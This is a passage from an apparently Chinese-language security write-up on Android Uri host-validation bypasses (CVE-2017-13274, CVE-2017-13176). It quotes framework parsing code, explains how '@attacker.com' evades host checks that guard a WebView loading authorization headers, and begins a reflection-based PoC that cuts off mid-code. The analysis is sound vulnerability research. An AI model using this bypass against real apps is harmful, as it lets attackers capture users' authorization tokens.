style="color:rgb(0,0,0);"><span class="hljs-function"><span class="hljs-title">parseUserInfo</span></span></span><span class="hljs-function"><span class="hljs-params">()</span> </span>{</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp;<span class="cm-variable-3" style="color:rgb(0,136,85);">String</span> <span class="cm-variable" style="color:rgb(0,0,0);">authority</span> <span class="cm-operator" style="color:rgb(152,26,26);">=</span> <span class="cm-variable" style="color:rgb(0,0,0);">getEncodedAuthority</span>();</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp;<span class="cm-variable-3" style="color:rgb(0,136,85);"><span class="hljs-keyword">int</span></span> <span class="cm-variable" style="color:rgb(0,0,0);">end</span> <span class="cm-operator" style="color:rgb(152,26,26);">=</span> <span class="cm-variable" style="color:rgb(0,0,0);">authority</span>.<span class="cm-variable" style="color:rgb(0,0,0);">indexOf</span>(<span class="cm-string" style="color:rgb(170,17,17);"><span class="hljs-string">&#39;@&#39;</span></span>);</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp;<span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-keyword">return</span></span> <span class="cm-variable" style="color:rgb(0,0,0);">end</span> <span class="cm-operator" style="color:rgb(152,26,26);">==</span> <span class="cm-variable" style="color:rgb(0,0,0);">NOT_FOUND</span> <span class="cm-operator" style="color:rgb(152,26,26);">?</span> <span class="cm-atom" style="color:rgb(34,17,153);"><span class="hljs-keyword">null</span></span> : <span class="cm-variable" style="color:rgb(0,0,0);">authority</span>.<span class="cm-variable" style="color:rgb(0,0,0);">substring</span>(<span class="cm-number" style="color:rgb(17,102,68);"><span class="hljs-number">0</span></span>, <span class="cm-variable" style="color:rgb(0,0,0);">end</span>);</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp;}</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp;...</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp;<span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-function"><span class="hljs-keyword">private</span></span></span><span class="hljs-function"> </span><span class="cm-variable-3" style="color:rgb(0,136,85);"><span class="hljs-function">String</span></span><span class="hljs-function"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-function"><span class="hljs-title">parseHost</span></span></span><span class="hljs-function"><span class="hljs-params">()</span> </span>{</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp;<span class="cm-variable-3" style="color:rgb(0,136,85);">String</span> <span class="cm-variable" style="color:rgb(0,0,0);">authority</span> <span class="cm-operator" style="color:rgb(152,26,26);">=</span> <span class="cm-variable" style="color:rgb(0,0,0);">getEncodedAuthority</span>();</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp;<span class="cm-comment" style="color:rgb(170,85,0);"><span class="hljs-comment">// Parse out user info and then port.</span></span></span><br/><span style="padding-right:.1px;"><span class="hljs-comment"> &nbsp; &nbsp; &nbsp; &nbsp;</span><span class="cm-variable-3" style="color:rgb(0,136,85);"><span class="hljs-comment">int</span></span><span class="hljs-comment"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">userInfoSeparator</span></span><span class="hljs-comment"> </span><span class="cm-operator" style="color:rgb(152,26,26);"><span class="hljs-comment">=</span></span><span class="hljs-comment"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">authority</span></span><span class="hljs-comment">.</span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">indexOf</span></span><span class="hljs-comment">(</span><span class="cm-string" style="color:rgb(170,17,17);"><span class="hljs-comment">&#39;@&#39;</span></span><span class="hljs-comment">);</span></span><br/><span style="padding-right:.1px;"><span class="hljs-comment"> &nbsp; &nbsp; &nbsp; &nbsp;</span><span class="cm-variable-3" style="color:rgb(0,136,85);"><span class="hljs-comment">int</span></span><span class="hljs-comment"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">portSeparator</span></span><span class="hljs-comment"> </span><span class="cm-operator" style="color:rgb(152,26,26);"><span class="hljs-comment">=</span></span><span class="hljs-comment"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">authority</span></span><span class="hljs-comment">.</span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">indexOf</span></span><span class="hljs-comment">(</span><span class="cm-string" style="color:rgb(170,17,17);"><span class="hljs-comment">&#39;:&#39;</span></span><span class="hljs-comment">, </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">userInfoSeparator</span></span><span class="hljs-comment">);</span></span><br/><span style="padding-right:.1px;"><span class="hljs-comment"> &nbsp; &nbsp; &nbsp; &nbsp;</span><span class="cm-variable-3" style="color:rgb(0,136,85);"><span class="hljs-comment">String</span></span><span class="hljs-comment"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">encodedHost</span></span><span class="hljs-comment"> </span><span class="cm-operator" style="color:rgb(152,26,26);"><span class="hljs-comment">=</span></span><span class="hljs-comment"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">portSeparator</span></span><span class="hljs-comment"> </span><span class="cm-operator" style="color:rgb(152,26,26);"><span class="hljs-comment">==</span></span><span class="hljs-comment"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">NOT_FOUND</span></span></span><br/><span style="padding-right:.1px;"><span class="hljs-comment"> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</span><span class="cm-operator" style="color:rgb(152,26,26);"><span class="hljs-comment">?</span></span><span class="hljs-comment"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">authority</span></span><span class="hljs-comment">.</span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">substring</span></span><span class="hljs-comment">(</span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">userInfoSeparator</span></span><span class="hljs-comment"> </span><span class="cm-operator" style="color:rgb(152,26,26);"><span class="hljs-comment">+</span></span><span class="hljs-comment"> </span><span class="cm-number" style="color:rgb(17,102,68);"><span class="hljs-comment">1</span></span><span class="hljs-comment">)</span></span><br/><span style="padding-right:.1px;"><span class="hljs-comment"> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;: </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">authority</span></span><span class="hljs-comment">.</span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">substring</span></span><span class="hljs-comment">(</span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">userInfoSeparator</span></span><span class="hljs-comment"> </span><span class="cm-operator" style="color:rgb(152,26,26);"><span class="hljs-comment">+</span></span><span class="hljs-comment"> </span><span class="cm-number" style="color:rgb(17,102,68);"><span class="hljs-comment">1</span></span><span class="hljs-comment">, </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">portSeparator</span></span><span class="hljs-comment">);</span></span><br/><span style="padding-right:.1px;"><span class="hljs-comment"> &nbsp; &nbsp; &nbsp; &nbsp;</span><span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-comment">return</span></span><span class="hljs-comment"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">decode</span></span><span class="hljs-comment">(</span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">encodedHost</span></span><span class="hljs-comment">);</span></span><br/><span style="padding-right:.1px;"><span class="hljs-comment"> &nbsp; &nbsp;}</span></span><br/><span style="padding-right:.1px;"><span class="hljs-comment">}</span></span></code></pre><p>就在这里把@符号之前内容的作为 UserInfo 给切断了，host 内容从@符号之后算起。（这里其实存在另一个 bug，没有考虑多个@的情况）</p><h3>1.3. 影响范围</h3><p>Google 在 2018年4月的 Android 安全公告里发布了这个漏洞CVE-2017-13274的补丁</p><p>通过AndroidXRef查询，这个补丁在 
Oreo – 8.1.0_r33 才加入到原生源码中。所以安全补丁日期早于2018-04-01的系统都受影响，而 Google 一般通过协议要求
 OEM 厂商保证产品上市之后两年内按期打安全补丁。那么经过推算得出 Android 6及以下的系统都受影响。</p><p>PS：url含多个@的情况也在2018年1月的补丁中进行了修复CVE-2017-13176</p><h2>二、反射调用HierarchicalUri构造Uri</h2><h3>2.1. 检查UserInfo</h3><p>上一节提到了@的截取的特性，会把恶意地址前缀<code>attacker.com</code>存入 UserInfo，那么现在改进校验方法, 加上 UserInfo 的检查是不是就万无一失了呢？</p><pre><code class="hljs java"><span style="padding-right:.1px;">[<span class="cm-variable" style="color:rgb(0,0,0);">check_v2</span>]</span><br/><span style="padding-right:.1px;"><span class="cm-variable" style="color:rgb(0,0,0);">Uri</span> <span class="cm-variable" style="color:rgb(0,0,0);">uri</span> <span class="cm-operator" style="color:rgb(152,26,26);">=</span> <span class="cm-variable" style="color:rgb(0,0,0);">getIntent</span>().<span class="cm-variable" style="color:rgb(0,0,0);">getData</span>();</span><br/><span style="padding-right:.1px;"><span class="cm-variable-3" style="color:rgb(0,136,85);"><span class="hljs-keyword">boolean</span></span> <span class="cm-variable" style="color:rgb(0,0,0);">isOurDomain</span> <span class="cm-operator" style="color:rgb(152,26,26);">=</span> <span class="cm-string" style="color:rgb(170,17,17);"><span class="hljs-string">"https"</span></span>.<span class="cm-variable" style="color:rgb(0,0,0);">equals</span>(<span class="cm-variable" style="color:rgb(0,0,0);">uri</span>.<span class="cm-variable" style="color:rgb(0,0,0);">getScheme</span>()) <span class="cm-operator" style="color:rgb(152,26,26);">&&</span></span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="cm-variable" style="color:rgb(0,0,0);">uri</span>.<span class="cm-variable" style="color:rgb(0,0,0);">getUserInfo</span>() <span class="cm-operator" style="color:rgb(152,26,26);">==</span> <span class="cm-atom" style="color:rgb(34,17,153);"><span class="hljs-keyword">null</span></span> <span class="cm-operator" style="color:rgb(152,26,26);">&&</span></span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="cm-string" style="color:rgb(170,17,17);"><span class="hljs-string">"legitimate.com"</span></span>.<span class="cm-variable" style="color:rgb(0,0,0);">equals</span>(<span class="cm-variable" style="color:rgb(0,0,0);">uri</span>.<span class="cm-variable" style="color:rgb(0,0,0);">getHost</span>());</span><br/><span style="padding-right:.1px;"><span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-keyword">if</span></span> (<span class="cm-variable" style="color:rgb(0,0,0);">isOurDomain</span>) {</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp;<span class="cm-variable" style="color:rgb(0,0,0);">webView</span>.<span class="cm-variable" style="color:rgb(0,0,0);">load</span>(<span class="cm-variable" style="color:rgb(0,0,0);">uri</span>.<span class="cm-variable" style="color:rgb(0,0,0);">toString</span>(), <span class="cm-variable" style="color:rgb(0,0,0);">getAuthorizationHeaders</span>());</span><br/><span style="padding-right:.1px;">}</span></code></pre><h3>2.2. 挖掘思路</h3><p>我们还是看<code>android.net.Uri</code>源码，发现除了StringUri，还有一个内部类也 HierarchicalUri 也继承了 AbstractHierarchicalUri</p><pre><code class="hljs java"><span style="padding-right:.1px;">[<span class="cm-variable" style="color:rgb(0,0,0);">frameworks</span><span class="cm-operator" style="color:rgb(152,26,26);">/</span><span class="cm-variable" style="color:rgb(0,0,0);">base</span><span class="cm-operator" style="color:rgb(152,26,26);">/</span><span class="cm-variable" style="color:rgb(0,0,0);">core</span><span class="cm-operator" style="color:rgb(152,26,26);">/</span><span class="cm-variable" style="color:rgb(0,0,0);">java</span><span class="cm-operator" style="color:rgb(152,26,26);">/</span><span class="cm-variable" style="color:rgb(0,0,0);">android</span><span class="cm-operator" style="color:rgb(152,26,26);">/</span><span class="cm-variable" style="color:rgb(0,0,0);">net</span><span class="cm-operator" style="color:rgb(152,26,26);">/</span><span class="cm-variable" style="color:rgb(0,0,0);">Uri</span>.<span class="cm-variable" style="color:rgb(0,0,0);">java</span>]</span><br/><span style="padding-right:.1px;"><span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-keyword">private</span></span> <span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-keyword">static</span></span> <span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-class"><span class="hljs-keyword">class</span></span></span><span class="hljs-class"> </span><span class="cm-def" style="color:rgb(0,0,255);"><span class="hljs-class"><span class="hljs-title">HierarchicalUri</span></span></span><span class="hljs-class"> </span><span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-class"><span class="hljs-keyword">extends</span></span></span><span class="hljs-class"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-class"><span class="hljs-title">AbstractHierarchicalUri</span></span></span><span class="hljs-class"> </span>{</span><br/><span style="padding-right:.1px;"><span></span></span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp;<span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-keyword">private</span></span> <span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-keyword">final</span></span> <span class="cm-variable-3" style="color:rgb(0,136,85);">String</span> <span class="cm-variable" style="color:rgb(0,0,0);">scheme</span>; <span class="cm-comment" style="color:rgb(170,85,0);"><span class="hljs-comment">// can be null</span></span></span><br/><span style="padding-right:.1px;"><span class="hljs-comment"> &nbsp; &nbsp;</span><span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-comment">private</span></span><span class="hljs-comment"> </span><span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-comment">final</span></span><span class="hljs-comment"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">Part</span></span><span class="hljs-comment"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">authority</span></span><span class="hljs-comment">;</span></span><br/><span style="padding-right:.1px;"><span class="hljs-comment"> &nbsp; &nbsp;</span><span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-comment">private</span></span><span class="hljs-comment"> </span><span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-comment">final</span></span><span class="hljs-comment"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">PathPart</span></span><span class="hljs-comment"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">path</span></span><span class="hljs-comment">;</span></span><br/><span style="padding-right:.1px;"><span class="hljs-comment"> &nbsp; &nbsp;</span><span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-comment">private</span></span><span class="hljs-comment"> </span><span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-comment">final</span></span><span class="hljs-comment"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">Part</span></span><span class="hljs-comment"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">query</span></span><span class="hljs-comment">;</span></span><br/><span style="padding-right:.1px;"><span class="hljs-comment"> &nbsp; &nbsp;</span><span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-comment">private</span></span><span class="hljs-comment"> </span><span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-comment">final</span></span><span class="hljs-comment"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">Part</span></span><span class="hljs-comment"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">fragment</span></span><span class="hljs-comment">;</span></span><br/><span style="padding-right:.1px;"><span><span class="hljs-comment"></span></span></span><br/><span style="padding-right:.1px;"><span class="hljs-comment"> &nbsp; &nbsp;</span><span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-comment">private</span></span><span class="hljs-comment"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">HierarchicalUri</span></span><span class="hljs-comment">(</span><span class="cm-variable-3" style="color:rgb(0,136,85);"><span class="hljs-comment">String</span></span><span class="hljs-comment"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">scheme</span></span><span class="hljs-comment">, </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">Part</span></span><span class="hljs-comment"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">authority</span></span><span class="hljs-comment">, </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">PathPart</span></span><span class="hljs-comment"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">path</span></span><span class="hljs-comment">, </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">Part</span></span><span class="hljs-comment"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">query</span></span><span class="hljs-comment">, </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">Part</span></span><span class="hljs-comment"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">fragment</span></span><span class="hljs-comment">) {</span></span><br/><span style="padding-right:.1px;"><span class="hljs-comment"> &nbsp; &nbsp; &nbsp; &nbsp;</span><span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-comment">this</span></span><span class="hljs-comment">.</span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">scheme</span></span><span class="hljs-comment"> </span><span class="cm-operator" style="color:rgb(152,26,26);"><span class="hljs-comment">=</span></span><span class="hljs-comment"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">scheme</span></span><span class="hljs-comment">;</span></span><br/><span style="padding-right:.1px;"><span class="hljs-comment"> &nbsp; &nbsp; &nbsp; &nbsp;</span><span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-comment">this</span></span><span class="hljs-comment">.</span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">authority</span></span><span class="hljs-comment"> </span><span class="cm-operator" style="color:rgb(152,26,26);"><span class="hljs-comment">=</span></span><span class="hljs-comment"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">Part</span></span><span class="hljs-comment">.</span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">nonNull</span></span><span class="hljs-comment">(</span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">authority</span></span><span class="hljs-comment">);</span></span><br/><span style="padding-right:.1px;"><span class="hljs-comment"> &nbsp; &nbsp; &nbsp; &nbsp;</span><span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-comment">this</span></span><span class="hljs-comment">.</span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">path</span></span><span class="hljs-comment"> </span><span class="cm-operator" style="color:rgb(152,26,26);"><span class="hljs-comment">=</span></span><span class="hljs-comment"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">path</span></span><span class="hljs-comment"> </span><span class="cm-operator" style="color:rgb(152,26,26);"><span class="hljs-comment">==</span></span><span class="hljs-comment"> </span><span class="cm-atom" style="color:rgb(34,17,153);"><span class="hljs-comment">null</span></span><span class="hljs-comment"> </span><span class="cm-operator" style="color:rgb(152,26,26);"><span class="hljs-comment">?</span></span><span class="hljs-comment"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">PathPart</span></span><span class="hljs-comment">.</span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">NULL</span></span><span class="hljs-comment"> : </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">path</span></span><span class="hljs-comment">;</span></span><br/><span style="padding-right:.1px;"><span class="hljs-comment"> &nbsp; &nbsp; &nbsp; &nbsp;</span><span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-comment">this</span></span><span class="hljs-comment">.</span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">query</span></span><span class="hljs-comment"> </span><span class="cm-operator" style="color:rgb(152,26,26);"><span class="hljs-comment">=</span></span><span class="hljs-comment"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">Part</span></span><span class="hljs-comment">.</span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">nonNull</span></span><span class="hljs-comment">(</span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">query</span></span><span class="hljs-comment">);</span></span><br/><span style="padding-right:.1px;"><span class="hljs-comment"> &nbsp; &nbsp; &nbsp; &nbsp;</span><span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-comment">this</span></span><span class="hljs-comment">.</span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">fragment</span></span><span class="hljs-comment"> </span><span class="cm-operator" style="color:rgb(152,26,26);"><span class="hljs-comment">=</span></span><span class="hljs-comment"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">Part</span></span><span class="hljs-comment">.</span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">nonNull</span></span><span class="hljs-comment">(</span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-comment">fragment</span></span><span class="hljs-comment">);</span></span><br/><span style="padding-right:.1px;"><span class="hljs-comment"> &nbsp; &nbsp;}</span></span><br/><span style="padding-right:.1px;"><span><span class="hljs-comment"></span></span></span><br/><span style="padding-right:.1px;"><span class="hljs-comment"> &nbsp; &nbsp;...</span></span><br/><span style="padding-right:.1px;"><span class="hljs-comment">}</span></span></code></pre><p>而AbstractHierarchicalUri又是继承自Uri，所以很容易想到，通过反射调用HierarchicalUri这个私有构造函数，传入构造好的
 authority 和 path, 创建一个任意可控的Uri实例。继续查看Part和PathPart类的构造方法：</p><pre><code class="hljs java"><span style="padding-right:.1px;"><span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-keyword">static</span></span> <span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-class"><span class="hljs-keyword">class</span></span></span><span class="hljs-class"> </span><span class="cm-def" style="color:rgb(0,0,255);"><span class="hljs-class"><span class="hljs-title">Part</span></span></span><span class="hljs-class"> </span><span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-class"><span class="hljs-keyword">extends</span></span></span><span class="hljs-class"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-class"><span class="hljs-title">AbstractPart</span></span></span><span class="hljs-class"> </span>{</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp;<span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-function"><span class="hljs-keyword">private</span></span></span><span class="hljs-function"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-function"><span class="hljs-title">Part</span></span></span><span class="hljs-function"><span class="hljs-params">(</span></span><span class="cm-variable-3" style="color:rgb(0,136,85);"><span class="hljs-function"><span class="hljs-params">String</span></span></span><span class="hljs-function"><span class="hljs-params"> </span></span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-function"><span class="hljs-params">encoded</span></span></span><span class="hljs-function"><span class="hljs-params">, </span></span><span class="cm-variable-3" style="color:rgb(0,136,85);"><span class="hljs-function"><span class="hljs-params">String</span></span></span><span class="hljs-function"><span class="hljs-params"> </span></span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-function"><span class="hljs-params">decoded</span></span></span><span class="hljs-function"><span class="hljs-params">)</span> </span>{</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp;<span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-keyword">super</span></span>(<span class="cm-variable" style="color:rgb(0,0,0);">encoded</span>, <span class="cm-variable" style="color:rgb(0,0,0);">decoded</span>);</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp;}</span><br/><span style="padding-right:.1px;">}</span><br/><span style="padding-right:.1px;"><span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-keyword">static</span></span> <span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-class"><span class="hljs-keyword">class</span></span></span><span class="hljs-class"> </span><span class="cm-def" style="color:rgb(0,0,255);"><span class="hljs-class"><span class="hljs-title">PathPart</span></span></span><span class="hljs-class"> </span><span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-class"><span class="hljs-keyword">extends</span></span></span><span class="hljs-class"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-class"><span class="hljs-title">AbstractPart</span></span></span><span class="hljs-class"> </span>{</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp;<span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-function"><span class="hljs-keyword">private</span></span></span><span class="hljs-function"> </span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-function"><span class="hljs-title">PathPart</span></span></span><span class="hljs-function"><span class="hljs-params">(</span></span><span class="cm-variable-3" style="color:rgb(0,136,85);"><span class="hljs-function"><span class="hljs-params">String</span></span></span><span class="hljs-function"><span class="hljs-params"> </span></span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-function"><span class="hljs-params">encoded</span></span></span><span class="hljs-function"><span class="hljs-params">, </span></span><span class="cm-variable-3" style="color:rgb(0,136,85);"><span class="hljs-function"><span class="hljs-params">String</span></span></span><span class="hljs-function"><span class="hljs-params"> </span></span><span class="cm-variable" style="color:rgb(0,0,0);"><span class="hljs-function"><span class="hljs-params">decoded</span></span></span><span class="hljs-function"><span class="hljs-params">)</span> </span>{</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp;<span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-keyword">super</span></span>(<span class="cm-variable" style="color:rgb(0,0,0);">encoded</span>, <span class="cm-variable" style="color:rgb(0,0,0);">decoded</span>);</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp;}</span><br/><span style="padding-right:.1px;">}</span></code></pre><h3>2.3. 构造PoC</h3><p>由此构造 PoC 如下：</p><pre><code class="hljs javascript"><span style="padding-right:.1px;"><span class="cm-keyword" style="color:rgb(119,0,136);">public</span> <span class="cm-variable-3" style="color:rgb(0,136,85);"><span class="hljs-keyword">void</span></span> <span class="cm-def" style="color:rgb(0,0,255);">PoC</span>() {</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp;<span class="cm-keyword" style="color:rgb(119,0,136);">private</span> <span class="cm-keyword" style="color:rgb(119,0,136);">static</span> <span class="cm-keyword" style="color:rgb(119,0,136);">final</span> <span class="cm-variable-3" style="color:rgb(0,136,85);"><span class="hljs-built_in">String</span></span> <span class="cm-variable" style="color:rgb(0,0,0);">TAG</span> <span class="cm-operator" style="color:rgb(152,26,26);">=</span> <span class="cm-string" style="color:rgb(170,17,17);"><span class="hljs-string">"PoC"</span></span>;</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp;<span class="cm-variable-3" style="color:rgb(0,136,85);"><span class="hljs-built_in">String</span></span> <span class="cm-variable" style="color:rgb(0,0,0);">attackerUri</span> <span class="cm-operator" style="color:rgb(152,26,26);">=</span> <span class="cm-string" style="color:rgb(170,17,17);"><span class="hljs-string">"@attacker.com"</span></span>;</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp;<span class="cm-variable-3" style="color:rgb(0,136,85);"><span class="hljs-built_in">String</span></span> <span class="cm-variable" style="color:rgb(0,0,0);">legitimateUri</span> <span class="cm-operator" style="color:rgb(152,26,26);">=</span> <span class="cm-string" style="color:rgb(170,17,17);"><span class="hljs-string">"legitimate.com"</span></span>;</span><br/><span style="padding-right:.1px;"><span></span></span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp;<span class="cm-keyword" style="color:rgb(119,0,136);"><span class="hljs-keyword">try</span></span> {</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp;<span class="cm-variable" style="color:rgb(0,0,0);">Class</span> <span class="cm-variable" style="color:rgb(0,0,0);">partClass</span> <span class="cm-operator" style="color:rgb(152,26,26);">=</span> <span class="cm-variable" style="color:rgb(0,0,0);">Class</span>.<span class="cm-variable" style="color:rgb(0,0,0);">forName</span>(<span class="cm-string" style="color:rgb(170,17,17);"><span class="hljs-string">"android.net.Uri$Part"</span></span>);</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp;<span class="cm-variable" style="color:rgb(0,0,0);">Constructor</span> <span class="cm-variable" style="color:rgb(0,0,0);">partConstructor</span> <span class="cm-operator" style="color:rgb(152,26,26);">=</span> <span class="cm-variable" style="color:rgb(0,0,0);">partClass</span>.<span class="cm-variable" style="color:rgb(0,0,0);">getDeclaredConstructors</span>()[<span class="cm-number" style="color:rgb(17,102,68);"><span class="hljs-number">0</span></span>];</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp;<span class="cm-variable" style="color:rgb(0,0,0);">partConstructor</span>.<span class="cm-variable" style="color:rgb(0,0,0);">setAccessible</span>(<span class="cm-atom" style="color:rgb(34,17,153);"><span class="hljs-literal">true</span></span>);</span><br/><span style="padding-right:.1px;"><span></span></span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; &nbsp; &nbsp;<span class="cm-variable" style="color:rgb(0,0,0);">Class</span> <span class="cm-variable" style="color:rgb(0,0,0);">pathPartClass</span> <span class="cm-operator" style="color:rgb(152,26,26);">=</span> <span class="cm-variable" style="color:rgb(0,0,0);">Class</span>.<span class="cm-variable" style="color:rgb(0,0,0);">forName</span>(<span class="cm-string" style="color:rgb(170,17,17);"><span class="hljs-string">"android.net.Uri$PathPart"</span></span>);</span><br/><span style="padding-right:.1px;"> &nbsp; &nbsp; 